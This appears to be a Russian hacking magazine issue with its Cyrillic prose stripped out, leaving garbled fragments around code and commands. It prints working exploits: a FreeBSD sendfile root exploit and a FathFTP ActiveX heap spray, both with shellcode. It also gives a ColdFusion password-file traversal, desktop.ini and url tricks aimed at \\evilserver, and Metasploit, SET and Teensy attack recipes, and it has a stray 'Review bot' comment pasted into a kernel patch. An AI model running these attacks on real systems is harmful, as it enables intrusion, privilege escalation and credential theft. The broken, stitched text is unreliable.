; ( VoIP-): blabla1, blabla2 blabla3.
,
VoIP-, .
ivr-ch-pin, PIN: , 10 PIN.
PIN , PIN- .

CALL- ASTERISK'

, .
, PIN-, , Asterisk .
, !
, callback- ,
. ?
call-, . :
Channel: SIP/blabla1/8901234567
MaxRetries: 2
RetryTime: 3
WaitTime: 20
Context: ivr-pass
Extension: s
Priority: 2
Archive: Yes

... :
Channel , ;
MaxRetries .
, ;
RetryTime ;
WaitTime ,
, ;
Context ,
;
Extension ivr-pass, ,
( s);
Priority s,
( 2)
Archive Yes, call-
/var/spool/asterisk/outgoing_done
.
/var/spool/asterisk/outgoing/,
8901234567 (

call- , ).
20 , ,
. ,
s callback.

CALLBACK

, ,
AGI (AsteriskGatewayInterface), . Perl, PHP, C,
Bash. Bash
, :
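#!/bin/bash
# callback.agi: $1 = number to call back, $2 = name for the call file
# Build the call file in /tmp first, then move it into the spool directory,
# where Asterisk picks it up
echo "Channel: SIP/blabla1/$1" > "/tmp/$2"
echo "MaxRetries: 2" >> "/tmp/$2"
echo "RetryTime: 3" >> "/tmp/$2"
echo "WaitTime: 20" >> "/tmp/$2"
echo "Context: ivr-pass" >> "/tmp/$2"
echo "Extension: s" >> "/tmp/$2"
echo "Priority: 2" >> "/tmp/$2"
echo "Archive: Yes" >> "/tmp/$2"
mv "/tmp/$2" /var/spool/asterisk/outgoing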

callback.agi /var/lib/asterisk/agi-bin. : ($1 ),
, call- ($2 ).
callback, callback,
0.
PIN-.
0, . ivr-pass
callback:
[ivr-pass]
exten => s,1,GoToIf($["${callback}" != "0"]?callback,s,1)
exten => s,n,Background(WelcomePass) ;
exten => s,n,WaitExten(10)
exten => _XXXX,1,GoToIf($["${EXTEN}" = "${pin}"]?ivr,s,1)
exten => _XXXX,n,Hangup
exten => t,1,Hangup
exten => i,1,Hangup
[callback]
exten => s,1,AGI(callback.agi,${callback},${UNIQUEID})
exten => s,n,hangup

[callback] callback.agi : UNIQUEID call-. .

callback-.
: ,
.
CallerID, VoIP-. , VoIP, ( )
CallerID. . sim-dialer

20-25 . :).
,
callback . :)z



GreenDog agrrrdog@gmail.com

Easy Hack
1

:

:

, ( )
.
, .
. -,
, . , ...
-. - ,
:). , ,
:
, ;
;
;
;
;
;
;
, ;
:).

,
, -
. , .
. , ( , , ).
, . ,
pdf, .
pdf - .

:
IP DNS

:
, . .
, Dynamic DNS. DNS - ,
DNS . , ,
, .
(, www.no-ip.com, freedns.afraid.org www.dyndns.com) habrahabr.ru/blogs/webdev/101336.


- doc-: ,
.
. / :
http://support.microsoft.com/kb/825576/ ,
, . ,
.
,
, (smartpctools.com/metadata). : (tarasco.org/security/reversing_ole/index.html) ,
. , (,
). ,
( ).

DNS (, ) habrahabr.ru/blogs/linux/101380. , ,
. , IP,
(reverse_tcp_dns, reverse_https MSF). IP . ,
HTTP- :
GET /nic/update?hostname=_&myip=_ip HTTP/1.0
Host: dynupdate.no-ip.com
Authorization: Basic ____base64
User-Agent: blah-blah-blah v.0.1a

, , :).

:
DNS-

:
][
DNS- ( ). nbtool Ron Bowes (skullsecurity.org/wiki/index.php/Nbtool).
(skullsecurity.org/blog/?p=433) DNS- dnsxss (
nbtool).
, , DNS, dnsxss
DNS- .
? , XSS
DNS-lookup. ,

DNS- !
,
, -. ,
, ! -, XSS ,
( )
, , -, ,
, -,
, ,
...
:).
, . DNS-
, HTML, , , . , , / , FF
HTML, IE ( :).
. , - nbtool 0.05.

: TCP/IP.

:
. - ,
. : , , :).
TCP/IP. IP TCP( ICMP, UDP)
RFC: , , . ,
,
.
? ? ? ,
, .
.
1999-2000
(- ... , - :)),

(nmap.org/book/osdetect.html). .
- , , .
, TCP/IP- , ,

. , ,
, ,
. ,
, - . ,
, ,
, , ,
.
- p0f.
lcamtuf.coredump.cx.
, BackTrack 4. .
, 2006 .
.
:
SYN ( ) SYN-ACK;
;

EttercapNG

RST ( , );
ACK ( ).
.
NAT, , .
pcap-.
, ,
.
, , p0f
.
, , ,
IP. ,
.
, p0f (-i) eth0
(-S) (-o):
p0f -i eth0 -S -o os.txt

pcap- RST-:
p0f -R -s test_osdetect.pcap


RST- pcap-

(promiscuous
mode) -p , tcpdump,
.
, p0f , ,
, . , , , .
. p0f Ettercap (ettercap.sourceforge.net). , , .
1200 , 200 p0f.
Ettercap ( GTK, curses-):

,
/ , - , . ,
, .
, .

:
SMB relay-.
, ,
.
SMB
p0f . ?
Windows,
.


1)Sniff Unified sniffing


2)Start Start sniffing
3)View - Profiles

, ,
- . ,
dca.ufrn.br/~joaomedeiros/gsoc/2009/proposal/node1.html 2009
TCP ISN ( , p0f).
Nmap.

, , whois, dns lookup ..


attackvector.org/invasion-ofprivacy. . IP- ,
. . :).
, -
.
!

, ,
. lnk (), url ( ) desktop.ini ( ).
.
(TotalCommander
),
, . ,
url-.
url:
[InternetShortcut]
URL=http://www.example.com
IconFile=\\evilserver\ipc$

IconFile , ;

URL , .
, url-,
,
- .
lnk . .
.
, HE-.
desktop.ini. .
,
:
IconFile , , , desktop.ini;
LocalizedResourceName ;
InfoTip desktop.ini;
desktop.ini .
desktop.ini :
[.ShellClassInfo]
desktop.ini=@\\evilserver\ipc$,-1
InfoTip=@\\evilserver\ipc$,-1
LocalizedResourceName=@\\evilserver\ipc$,-1

IconFile=\\evilserver\ipc$

, desktop.ini ,
.
:
attrib +s _

,
, . .
, .
.
(tarasco.org/security/payload/index.html), ,
html doc (ppt, xls) .
, lnk-:
payload.exe -t l -d \\evilserver\ipc$

-t l lnk-;
-d .

:
WINPCAP

1)"wpcap.dll" C:\WINDOWS\system32\
2)"Packet.dll" C:\WINDOWS\system32\
3)"pthreadVC.dll" C:\WINDOWS\system32\
4)"npf.sys" C:\WINDOWS\system32\drivers\

:
, ,
. , , WinPcap . ,
XP, raw- , , -
( libpcap) WinPcap.
. Metasploit , , Win ( ).
, meterpreter icmp-,
WinPcap .
, . ,
,
. :

,
, , WinPcap. , -,
, -,
npf.sys ,
.
WinPCap ( ), ,
(500 ).
,
npf.sys ,
. z



, Digital Security a.sintsov@dsec.ru

01


PDF- IOS

TARGETS
Apple iPhone 3/3G/3GS
Apple iPod
Apple iPad
Apple iOS 3.X/4.0.X

CVE
CVE-2010-1797

BRIEF
, . ,
, , , iPhone.
,
. SSH-,
... , , ,
. Jailbreak.
. .
( ), AppStore, .
? , Jailbreak,
- @comex (iPhone Dev Team),
0day Apple. Defcon 18. ,
0day : PDF-, ,
iOS.
iPhone . , ,
, , , ,
Apple-.

/Filter[/FlateDecode]
/Length 10709>>
stream
x}
t -ldc0!
.... ....
endstream
endobj
15 0 obj
<< /Type /FontDescriptor /Ascent 750 /CapHeight 676 /
Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+TimesRoman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 13 0 R
>>
endobj

,
Type1C-, , , . , 15 ,
13 (/FontFile3 13 0 R), Type1C-.
(CFF - Compact Font Format) . ,
? /Filter[/FlateDecode],
, PDFTK
( - : paehl.de/pdf/gui_pdftk.html). ,
CFF-, ( ,
CFF), , , ROP-.
,
root' (
IOSurface).
, Jailbreak-, (
iOS) . .

SOLUTION
EXPLOIT
-, , . -
PDF-:
13 0 obj
<</Subtype/Type1C


Jailbreak', , ,
. .
, , , .
, Jailbreak,
, PDF-
.

iPhone. PDF

EXPLOIT
iPhone Jailbreak

02


FREEBSD

TARGETS
FreeBSD 7.x
FreeBSD 8.x

CVE

? sendfile() mbuf-
.
, .
,
mbuf-
, ,
( ). sendfile(), mbuf.
, ,
( ). ,
/bin/sh, , root.
( x64 x32,
x32):

CVE-2010-2693

BRIEF
FreeBSD Ming Fu. root
. Kingcope ,
. ,
.
(FreeBSD)
mbuf. , , ,
.
sendfile()
( ) . ,
. , ,
mbuf.
mbuf,
sendfile(). ...

main (int argc, char *argv[])


{
int s, f, k2;
struct sockaddr_in addr;
int flags;
// /tmp/sh root sticky bit
// ,
// ,
char str32[]=
"\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";

char buf[10000];


Kingcope FreeBSD

size = sb.st_size;
chunk = 0;

iPhone. URL,

char *p;
struct stat sb;
int n;
fd_set wset;
int64_t size;
off_t sbytes;
off_t sent = 0;
int chunk;
int arch = 3;
// loopback
s = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(7030);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
if (n < 0)
warn ("fail to connect");
// /bin/sh
f = open("/bin/sh", O_RDONLY);
if (f<0)
warn("fail to open file");

//
flags = fcntl(f, F_GETFL);
flags |= O_NONBLOCK;
fcntl(f, F_SETFL, flags);
// sendfile()
while (size > 0)
{
FD_ZERO(&wset);
FD_SET(s, &wset);
n = select(f+1, NULL, &wset, NULL, NULL);
if (n < 0)
continue;
if (chunk > 0)
{
sbytes = 0;
if (arch == 1)
n = sendfile(f,s,2048*2,chunk,NULL,&sbytes,0);
if (arch == 2)
n = sendfile(f,s,1204*6,chunk,NULL,&sbytes,0);
if (n < 0)
continue;
chunk -= sbytes;
size -= sbytes;
sent += sbytes;
continue;
}
chunk = 2048;

n = fstat(f, &sb);
if (n<0)
warn("fstat failed");


memset(buf, '\0', sizeof buf);


if (arch == 1)
{

ColdFusion

//nop
for (k2=0;k2<256;k2++)
{
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
// nop
memcpy(p, str32, sizeof str32);
n = k2 + sizeof str32;
p = buf;
}
//
// sendfile
// mbuf
// ,
// - /bin/sh
write(s, p, n);
}
}

, /bin/sh tmp:
cp /bin/sh /tmp/sh
cp /bin/sh /tmp/sh2

(ALT+F2) netcat, ,
...
nc -l 7030

:
gcc cache.c -o cache
./cache i386

. , ,
- /bin/sh,
/tmp/sh /tmp/sh2. /
tmp/sh, root.

ColdFusion

SOLUTION
, , , M_RDONLY.
======================================================
--- sys/kern/uipc_mbuf.c
(revision 209948)
+++ sys/kern/uipc_mbuf.c
(working copy)
@@ -302,6 +302,7 @@
n->m_ext.ref_cnt = m->m_ext.ref_cnt;
n->m_ext.ext_type = m->m_ext.ext_type;
n->m_flags |= M_EXT;
+
n->m_flags |= m->m_flags & M_RDONLY;
}
/*
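Review bot: the added `n->m_flags |= m->m_flags & M_RDONLY;` carries no comment explaining why the read-only bit has to follow the shared external storage, and a one-line comment above it would stop a later cleanup from dropping it. Since `n` ends up referencing the same `m_ext` data as `m` (the `ref_cnt` and `ext_type` copies just above), it is also worth checking that every other place in uipc_mbuf.c that shares `m_ext` between two mbufs propagates M_RDONLY the same way, because this hunk covers only one site.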

04


COLDFUSION
TARGETS X

ColdFusion 9
ColdFusion 8
ColdFusion 7

CVE
CVE-2010-2861
BRIEF
ColdFusion Web. , , . ,
, . ColdFusion,

. (Richard Brain), Adobe.
, ,
.

EXPLOIT
, , , :


http://server/CFIDE/administrator/enter.cfm?locale=ru

.
ru , , , .
../.
, ColdFusion ,
.
en ( ).
en,
. , , ? , ,
, ,
C:/ColdFusionX/lib/password.properties.
, :
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

SHA1- . ,
, ,
(Niels Teusink):
1. (/CFIDE/
administrator/enter.cfm),
;
2. javascript:hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value), Enter. ;
3. ;
4. MITM-, Burp,
TamperData- FireFox;
5. Login;
6. Post-
cfadminPassword, .
;
7. !

;
, ,
ColdFusion, , , (
SYSTEM). , , .

SOLUTION
, ,
.
. , Adobe hotfix, : adobe.com/support/security/bulletins/apsb10-18.html

05


FATHFTP

- FTP
HTML, ActiveX-.
, , . ,
,
.

EXPLOIT
, , , SEH. ,
, - , , ,
. . , ,
, - .
- . ( , ). ,
, ,
- . ,
, .
, , , . , , ,
.
ASCI-, , ,
. 10
, Heap Spray ( ) SEH . Heap Spray,
, , 0x0C0C0C0C.
, Heap Spray ,
.
. ,
,
(, nop ,
). : nop
( 0x90). 28876
. FathFTP.
1540 . , , 0x0C.
FileExists(),
0x0C.
, ,
1540 .
, , ,
. SEH-
0x0C0C0C0C.
, .
,
SEH-. ,
0x0C0C0C0C.
,
(Heap Spray). .
0x90 ,
. :

TARGETS
FathFTP 1.8

CVE
N/A

<html>
//CLSID FathFTP
<object classid='clsid:62A989CE-D39A-11D5-86F0B9C370762176' id='target'></object>
<script>

BRIEF
FathFTP 79 , FTP- . -


// Skyland win32 bindshell 28876


TCP- cmd.exe

var shell = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b


3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348
b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df
%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%
u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u
1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7
768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc5
89%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7da
b%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6
%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%
uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%u
ffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u1
06a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53
db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec
0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0
%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%
ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u
5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uf
fff%uc483%u615c%u89eb");
// heap-spray, 90 nop
var bigbk=unescape("%u9090%u9090");
var header=20;
var space=header+shell.length;

while(bigbk.length < space) bigbk+=bigbk;


var fillbk=bigbk.substring(0,space);
var bk=bigbk.substring(0,bigbk.length-space);
while(bk.length+space<0x40000) bk= bk+bk+fillbk;
var mem=new Array();
//
for(i=0; i<800;i++) mem[i]=bk+shell;
var buff="";
// 0x0C
for(i=0; i<1540;i++) buff+=unescape("%0c%0c%0c%0c");
//
target.FileExists(buff);
</script>
</html>

SOLUTION
. - ,
, Kill bit. Kill bit , , , .
, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\,
62A989CE-D39A-11D5-86F0-B9C370762176 Compatibility Flags, REG_DWORD, 0x00000400.



D1g1 dsecrg.com

,

()

SET
, , ,
,
, . . ,
,
. ,
. . ...
vulnerability...
INTRODUCTION

.
, .
.
, .
,
, ,
, . ,
, PSYCHO,
,
.


IT IS BEAUTIFUL S.E.T.

. Social Engineer
Toolkit (SET), David
Kennedy (ReL1K), GPLv2.
toolkit ,
BackTrack,
. () SET
:
svn co http://svn.thepentest.com/social_engineering_toolkit /pentest/exploits/SET

www.social-engineer.org
SET , Python
,
. ,
.
,
( :)). , Python, SET ,
: Metasploit, ettercap, sendmail, apache
. , , ,
. SET
, . toolkit
, :
/pentest/exploits/SET/config/set_config

set_config ,
SET ( ).
, open-source, , - (0-day ), .
SET,
.
, SET
:
SET
E-MAIL ATTACK VECTOR
WEB ATTACK VECTOR
CD/DVD/USB ATTACK VECTOR
Teensy USB HID ATTACK VECTOR

-mail , file format, :


Adobe Flash Player 'newfunction' Invalid Pointer Use
X 09 /140/ 10

SET Nokia N900

Adobe Collab.collectEmailInfo Buffer Overflow


Adobe Collab.getIcon Buffer Overflow
Adobe JBIG2Decode Memory Corruption Exploit
Adobe PDF Embedded EXE Social Engineering

-, , , :

LNK Code Execution (MS10-046)


Help Center XSS and Command Execution (MS10-042)
IE iepeers.dll Use After Free (MS10-018)
IE Tabular Data Control Exploit (MS10-018)
IE "Aurora" Memory Corruption (MS10-002)



.
, /pentest/exploits/SET/config/mailing_list.txt. . ,
,
. ,
:
Gmail-
Sendmail open-relay
- open-relay

Java Required
metasploit,
SET metasploit.
SET ,

Metasploit.
, ,
...

E-MAIL ATTACK VECTOR

email- .
Spear-Phishing Attack Vectors.
,
- . , .
, SET :

Social Engineering CTF


,
DEFCON 18 Riviera Hotel & Casino Las Vegas, Nevada. Social-Engineer.Org Offensive
Security. , , , .
,
, . ,
CTF, , .
: - , , , , ,
, ,
, .
URL. ,
, Google, BP, McAfee, Symantec, Shell, Microsoft,
Oracle, Cisco, Apple Walmart. , , :).
Digital Defense,
Warning Regarding DEF CON 18 Social Engineering Contest,

.


, :
Gmail-, SET, Sendmail, SET BackTrack,
, open-relay .
, SMTP- open-relay, NSE- Nmap:
nmap --script smtp-open-relay.nse <host>

pen-relay ,
, reverse
lookups,
.
(Meterpreter Reverse_TCP, Reverse VNC, Reverse TCP
Shell) metasploit
PDF-,
SET, PDF-.
listener , .

WEB ATTACK VECTOR

, , .
, ( ), -
-.
, ,
, , .

metasploit-fakeUpdate
g0tmi1k ,
bash- metasploit-fakeUpdate, ,
patch ( Linux, OSX, Windows), .
DHCP -, DNSSpoof
ARPSPoof, -
,
. ,
. , .
meterpreter SBD (Secure BackDoor) VNC, , , ,
backdoor. sniffer dsniff, , .
,
BackTrack.


HTTP://WWW
links

Teensy USB HID


, SET
ettercap, , ARP-spoofing.

. ,
.
XSS, email-,
... ,
. ,
,
. URL,
www.bit.ly (
). ,
,

/pentest/exploits/SET/src/program_junk/<name_file>.pdf.

, SET
, :

Gmail, Google, Facebook, Twitter


Java Required

-, ,
Java Required,
, Java, ,
.
Java Applet, .

- .
toolkit URL,
.
-.
,
, .
- ,
404, ,
...,
,
IE. ,
.
, , web-attack
The Java Applet . Java Applet Java
Certificate, , ,

metasploit payload.
, ,
, ,
Java. Java Applet
Thomas Werth.
, ,
, The Metasploit Browser
Exploit Method. SET
, .
IE ( ,
), ,
, IE , .
Credential Harvester ,
,
,
.
.
: , -
..

, ,
ICQ, Skype, Jabber e-mail.
Tabnabbing-.
,
Please wait while the site loads..., ,
,
,
, . ,
, , ,
(
). Credential Harvester. ,
SET 0.6.1, SSL (
, ).
.
Man Left in the Middle Attack toolkit
HTTP REFERER
,
. ,
, XSS ,
, . ,
XSS
Credential Harvester profit.

secmaniac.com David Kennedy (ReL1K), Social-Engineering Toolkit (SET)
offensive-security.com/metasploitunleashed/SocialEngineering-Toolkit Metasploit Unleashed SET
social-engineer.org Exploiting Human Vulnerabilities
g0tmi1k.blogspot.com/2010/05/scriptvideo-metasploitfakeupdate-v011.html g0tmi1k, metasploitfakeUpdate

INFO
info


SET

v0.6.1
Open-relay




.

WARNING
warning
!


!
,


!


mfu

CD/DVD/USB ATTACK VECTOR

,
LNK- ,
. SET
.
Infectious Media Generator,
payload, Encoder,
( AV bypass) reverse-connect.
SET autorun
: program.exe ( payload) autorun.inf,
program.exe. CD/DVD/USB
.

TEENSY USB HID ATTACK VECTOR

IronGeek WinFang SET


, Teensy USB HID (human interface device). ,
, . Teensy
mini-USB
. Teensy USB AVR- 16 , - 32-128 , RAM- 2,5-8
$18-27, .
,
USB-, ,
..
,
, ,
.
,
. ,
, USB U3
. ,
pde- Teensy. SET,


,
mfu
teensy.pde,
Arduino IDE Teensy Loader USB .
, Powershell
HTTP GET MSF, WSCRIPT HTTP GET MSF Powershell based Reverse
Shell. ,
payload C Arduino IDE, USB HID out of the box! 007 (
, ) , own' .

CONCLUSION

, , .
, .
, .
, , ...


"sh2kerr"

HITB


Hack In The Box. , ,
, ... ,
, ,
.
!

, , , ,
, Hack In The box . ,
( ) , ,
, , - , ,
, ,
,
, . ,
,
(
Fsecure, T2 ), , - .
,
,
, , , . ,
(, -, ) ,
, .


, , ,
, , ,
. , ,
,
.
, ( ,
Qualys), Laurent Oudot ( TEHTRI Security),
( , 2000-
, XProbe), Saumil Shah ( NetSquare) ,
, DSecRG. , ,
.

, ,
PCI DSS -.
.
, , ,
: Compliance First Security First.
, ,
X-Probe , , ,
, ,
, , . , ,

, Afterparty HITB
, , , .
, ,
ERP SAP, ,
SAP ,
sapsploit. BBC Radio1 ERP,
.
XprobeNG. , , , . XProbe
,
,
Nmap ( ,
). , :
1. , ,
, , ,
, , ,
,
;
2.
;
3. IPv6;
4. ,
.
, ,
, .
, http://xprobe.sourceforge.net.
, ,
, JitSpray, , , Flash,
JIT-. ,
( :) JIT-
Apple Safari.
. ,

,

.
, ,
How to rate the security of closed source software,
, Michael Thumann ERNW.
Troopers,
. : ,

. , , . :
?
, , - ,
, . ? ,
Thumanns
Trustworthiness Index. ,
. :
DEP ();
ASLR ();


SafeSEH ();
();
, /GS
( );
, ( );
(
);
( );
( );
( );
( );
.

, ,

.
, ,
.
Firefox.

DEP ASLR, . , ,
,
, , ,
. , , , , , ,
.

, ,
kane-box,
, John Kanen Flowers.
, ,
IDS/IPS, . , , OpenSource,
, . -,
open source hardware
. ,
,
, , . kane-box,
, Cisco PIX ( ).
$250 ( WiFi $300),
.
.
, ,


Microsoft

))

:
, , ,

PCI DSS, . , elite
,
,
/ $1250. , , .
.
,
. , , ,
, ,
.
, .
, , ,
.
, 16 . , , ,


Appprint,
web2.0
, , . , ,
, ? :) , ,
. .

WEB IN THE MIDDLE


wsscan
nCircle
Ncircle Suite 360.
. , ,
kane-box.com.

Niels Teusink ( , )
Hacking Wireless Presenters. -,
, , ,
,
. , , , ,
. , :
[Win+R]
cmd /c net use x: http://10.1.1.1/x&x:x
[Enter]

, Web in The Middle, Laurent


Oudot Tehtri Security.
, ,
HTTP-.
: , . , ,
. ,
- -,
SSL. ,
, . Mozilla

, , , ,
Tamperdata:
http://live.mozillamessaging.com/%APP%/whatsnew?locale=%LOCALE%&version=%VERSION%&os=%OS%&buildid=%APPBUILDID%

Thunderbird :
http://live.mozillamessaging.com/thunderbird/start?locale=en&version=3.0.4&os=Darwin&buildid=20100317134139

Apple iWork iLife:



,
.
. ,

apple.com/welcomescreen/ilife09/iphoto/
apple.com/welcomescreen/iwork09/numbers/
apple.com/welcomescreen/iwork09/keynote/



RAZ0R HTTP://RAZ0R.NAME

Jit spray !, , ?

apple.com/welcomescreen/iwork09/pages/
"GET /welcomescreen/iwork09/pages HTTP/1.1
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3;
en-us)
AppleWebKit/533.16 (KHTML, like Geck

,
. ,
ISR-evilgrade (infobyte.com.ar/down/isr-evilgrade-Readme.txt),
Infobyte Security Research. :

Java plugin;
Winzip;
Winamp;
MacOS;
OpenOffices;
iTunes;
Linkedin Toolbar;
DAP [Download Accelerator];
Notepad++;
speedbit.

API .
, - ,
, ,
. ,
, , , , .

Firefox eff.org/https-everywhere. 0-day , , Iphone, HTC, Blackberry , , IPad.
Safari Ipad Ipad. ,
0-day .

WEB 2.0

, ,
. - ,
, ,
Shreeraj Shah, BlueInfy,


s tticheck
firefox
Web 2.0. , , ,
, . ,
Web 2.0 2010 :
1.Dom based XSS Ajax;
2.SQL injection SOAP & XML;
3.Blind SQL over JSON;
4.Auth Bypass-XPATH and LDAP;
5.Business Logic Bypass;
6.Decompilation Attack and Info Leakage;
7.WSDL scanning and API exposure Cloud;
8.XSS with Flash;
9.CSRF with XML;
10.Widgets/Mashup Exploitation.

.
1. DOM.
, Web 2.0 Ajax- ,
JavaScript-:
document.write()
document.writeln()
document.body.innerHtml=
document.forms[0].action=
document.attachEvent()
document.create()
document.execCommand()
document.body.
window.attachEvent()
document.location=
document.location.hostname=
document.location.replace()
document.location.assign()

document.URL=
window.navigate()

-, , , DOMScan,
Dom-based XSS
- , , .
, blueinfy.
com/DOMScan.zip .
2. X-Path.
SQL- ,
, SQL, Xpath
. , , , -
, , ,
, SQL-. , :
string credential = "//users[@username='" + user + "' and @password='" + pass + "']";

' or 1=1 or ''=,


, ,
.
3. XSS Flash. SWF-,
, SWF decompiler.
? , , ,
. ,
:
on (release) {
getURL (_root.clickTAG, "_blank");
}

clickTAG,
. ,
http://url/to/flash-file.swf?clickTAG=javascript:alert('xss')

:
on (release) {
    if (_root.clickTAG.substring(0,5) == "http:" || _root.clickTAG.substring(0,6) == "https:" || _root.clickTAG.substring(0,1) == "/") {
        getURL (_root.clickTAG, "_blank");
    }
}


:
OWASP Flash Security Project
Blinded by flash (slides as pdf) by Prajakta Jagdalen Blackhat DC
2009
Neat, New, and Ridiculous Flash Hacks by Mike Bailey Blackhat
DC 2010
A Lazy Pen Tester's Guide to Testing Flash Applications
4. WSDL Scanning. WSDL. Web Service Discovery Language
-, XML.
XML- , XML-,
, , , . ,
. -

, :
Inurl:wsdl
Inurl:asmx

wsScanner,
XML-,
, , , , , -.
, ; , .
5. CSRF with XML. CSRF,
(, CSFU Cross
site file upload ). , , GET/
POST-, ,
, . ,
, XML-, SRF, XML- . : pentestmonkey.net/
blog/csrf-xml-post-request.

Web 2.0 :
DOMScan (Beta) DOM-
XSS-,
.
DOMTracer (Beta) Firefox,
DOM Web 2.0 .
Binging(Beta)
( ). API Bing.
Web2Fuzz (Beta) , JSON XML-.
Web2Proxy (Beta) , , Web 2.0
.
AppPrint (Beta) ,
, . , ,
Vkontakte.ru, : - nginx/0.7.59 Microsoft-IIS/7.0, Web
2.0 script.aculous.
AppCodeScan 1.2
.
,

Web 2.0, ,
, HITB, Blackhat .

HitbJob,
,
, , ,
- . ,
Google, .
, ,
Capture the flag,
.
,
-,
.
, , ,
. ,
!


GreenDog agrrrdog@gmail.com

METASPLOIT
FRAMEWORK
MSF

7 , MSF

, ,

. MSF .
MSF !
.
MSF, , ,
- , .
:).
, . , , / Metasploit .
, . , ,
- .
! MSF 3.4.2.

, MSF,
GTK. , ,


3.3 . , msfweb. , , ... !



. , . ,
Java, , MSF XMLRPC ,
.
: msfrpcd,
msfgui. msfgui start
new msfrpcd
Win:
1. Cygwin
2. cd /msf3

browser_autopwn : /
, ,
PostgreSQL + MSF. db_create
3. msfrpcd -S -U username -P password
S SSL, /
4. msfgui.jar, %MSF%\
msf3\data\gui , (
cygwine):
java -jar msfgui.jar

db_autopwn x ( ).
nmap
:
msf> db_nmap -PN -sV 192.168.0.101

msfgui /, , IP .
-, , . , . ,
, ,
..

, MSF
, .
.
,
PostgreSQL. SQLite - /
, MySQL - . , Postgres . MSF. Win: , postgres
. pgAdmin: ,
(msf_user),
(msf_db). SQL-, , MSF.
msfconsole:
msf> db_driver postgresql
msf> db_connect msf_user:pass@127.0.0.1:5432/msf_db

db_create , , , (
postgres), .
Postgres.
, workspace.
, , /
. , db_workspace .
:
db_service /,
, nmap,
. db_autopwn
p ( );
db_notes , , Nmap, WMap. , db_autopwn, ,
db_notes .
db_vulns , MSF(WMap),
Nessus(OpenVAS), Nexpose.

- MSF ,
. ( aux- version
scanner, , scanner/imap/imap_version).
msf> use scanner/portscan/tcp
msf> set RHOSTS 192.168.0.101
msf> set PORTS 1-1000
msf> run -j

,
MSF, resource.
MSF. ,
meterpreter.
(metrevhandl.rc) :
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.102
exploit -j
back

resource:
msf> resource metrevhandl.rc

. . ,
, , , MSF.
, home/.msf3/msfconsole.rc , msfconsole.
, .

...

WMAP. WMAP MSF -


- . WMAP ,
. -


PostgreSQL + MSF. db_edit


, , ,
, Rapid7
w3af , ,
MSF w3af.
( ):
1. wmap:
msf> load db_wmap
2. :
msf> wmap_targets -a http://www.example.com/
3. :
msf> wmap_run -t
msf> wmap_run -e

db_vulns, db_notes.
. setg.
WMAP (wmap_crawler) (wmap_proxy).
MSF scanner/http/sqlmap.
SQLmap. , ,
:). sqlmap.
sourceforge.net.
db_autopwn. MSF
:
-R , ;
-m .
:

!
.
/. ,
(JavaScript) . ,
User-Agent, .
,
, ,
. .

( )
.
, 192.168.0.102:
msf> use server/browser_autopwn
msf> set LHOST 192.168.0.102
msf> set URI index.php
msf> exploit -j

http://192.168.0.102/index.php
(. ).

VBA

EasyHack MSF,
exe- . , ,
. - :

msf> db_autopwn -t -p -m windows -R excellent

Win-.
, 3.3.1 Nexpose MSF
.
1. Nexpose:
msf> load nexpose
msf> nexpose_connect msf_user:pass@127.0.0.1
2. :
msf> nexpose_scan -R excellent -x 192.168.0.101

BROWSER_AUTOPWN

,
, ,
.
, HTTP-
. ,
, -


msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

, ,
. VBA,
(MACRO CODE) ( >

:
msfconsole Tab, -h.
Ctrl+C, Ctrl+Z.
cygwin /
, Shift+Insert.
msfcli, msfpayload .. cygwin. ,
.

INFO

info

, , .
,

MSF
netcat

metasploit:
offensive-security.com/metasploitunleashed/
metasploit.com

VB),
(PAYLOAD DATA). - .
( OfficeXP,
), !
. ,
,
.
5555 .

(payload)
. MSF ,
( Win*), . -, ,
(ruby, perl).
:
Inline .
, ;
Stager , .
,
, ;
Ord . ,

DLL;
Bind ;
Reverse -;
Findport , , .
;
Findtag ,
4- .;
Exec, Download_exec, Up_exec
, / ;
Meterpreter :);
VNC VNC- ;
dllinjection DLL .
DLL ;
